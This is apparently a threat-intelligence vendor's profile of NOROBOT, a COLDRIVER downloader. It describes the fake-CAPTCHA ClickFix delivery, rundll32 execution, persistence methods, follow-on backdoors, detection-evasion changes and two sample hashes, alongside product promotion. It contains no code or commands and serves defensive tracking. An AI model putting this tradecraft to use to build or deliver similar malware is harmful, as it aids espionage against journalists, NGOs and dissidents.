NOROBOT
NOROBOT is a downloader malware family in COLDRIVER’s (also tracked as Star Blizzard, UNC4057, and Callisto) 2025 “ROBOT” suite. Google Threat Intelligence Group (GTIG) reported that COLDRIVER deployed NOROBOT within days of public disclosure of its LOSTKEYS malware and continued iterating it from May through September 2025. NOROBOT is delivered through ClickFix-style fake CAPTCHA pages, including HTML lures referred to as COLDCOPY, which trick victims into executing the malware via rundll32.exe. GTIG described NOROBOT as being in constant development to evade detection.
Its role is to stage follow-on payloads and establish persistence. Reported NOROBOT variants fetched additional files, set up persistence via a Windows logon script, and in other reporting established persistence via registry modifications and scheduled tasks. Early versions prepared the host for the Python backdoor YESROBOT, including downloading a full Python 3.8 installation, while later versions delivered the PowerShell backdoor MAYBEROBOT, which became COLDRIVER’s preferred follow-on implant. GTIG observed a simplified NOROBOT variant in early June 2025 that fetched a single file to create a logon script, which then executed PowerShell to download and run MAYBEROBOT. GTIG also reported that COLDRIVER repeatedly changed NOROBOT’s DLL name, export name, infrastructure, file naming conventions, retrieval paths, and cryptographic key handling to hinder detection and reconstruction of the full infection chain.
The malware is associated with Russian state-sponsored espionage activity attributed to COLDRIVER. Reported targeting includes high-value victims in policy, NGO, academic, government, think tank, journalist, media, dissident, and civil society contexts, with the objective of intelligence collection and information theft from compromised devices. High-confidence indicators directly mentioned in the content include the NOROBOT sample hash 3b49904b68aedb6031318438ad2ff7be4bf9fd865339330495b177d5c4be69d1 and the related next-stage PowerShell payload hash b60100729de2f468caf686638ad513fe28ce61590d2b0d8db85af9edc5da98f9. Zscaler tracks NOROBOT as BAITSWITCH.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The new infection chain, themed around CAPTCHA lures, features a family of malware we’ve named the “ROBOT” suite: NOROBOT: A downloader that has been in constant development to evade detection.
Techniques & procedures
8 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique"Typically, the threat group deploys malware in phishing attacks..."
Execution
2 techniques"NOROBOT gains persistence through registry modifications and scheduled tasks..."
The new infection chain, themed around CAPTCHA lures, features a family of malware we’ve named the “ROBOT” suite
Persistence
3 techniques"...fetches a single file, which we observed to be a single command that sets up a logon script for persistence. The logon script was a Powershell command which downloaded and executed the next stage..."
"NOROBOT gains persistence through registry modifications and scheduled tasks..."
Privilege Escalation
3 techniques"...fetches a single file, which we observed to be a single command that sets up a logon script for persistence. The logon script was a Powershell command which downloaded and executed the next stage..."
"NOROBOT gains persistence through registry modifications and scheduled tasks..."
Stealth
2 techniques"...complex delivery chain that splits cryptographic keys across multiple components. Decrypting the final payload depended on combining the pieces correctly..."
"...tricked the target into executing it via rundll32 under the guise of a verification process."
Command and Control
1 techniqueNOROBOT: A downloader that has been in constant development to evade detection.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A COLDRIVER-attributed set of lightweight custom tools referred to as the ROBOT chain (NOROBOT/YESROBOT/MAYBEROBOT), reported in 2025 and associated with ClickFix-style delivery. The content frames it as newly reported malware used by COLDRIVER, but does not provide technical details beyond being a distinct malware/tooling set.
Multi-stage espionage malware delivered via fake CAPTCHA/ClickFix social engineering; uses evolving delivery chains and encrypted payload handling (including variants that split cryptographic key material across components) and can establish persistence (e.g., via logon script).
DLL-based first-stage component delivered via an HTML ClickFix lure (COLDCOPY) and executed with rundll32.exe to drop/launch subsequent-stage malware in the ROBOT chain.
Malicious DLL delivered via ClickFix (fake CAPTCHA) social engineering and executed with rundll32. Used as an initial-stage loader/dropper to establish persistence (registry changes, scheduled tasks) and deliver follow-on backdoors (initially a Python-based backdoor, later a PowerShell backdoor).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.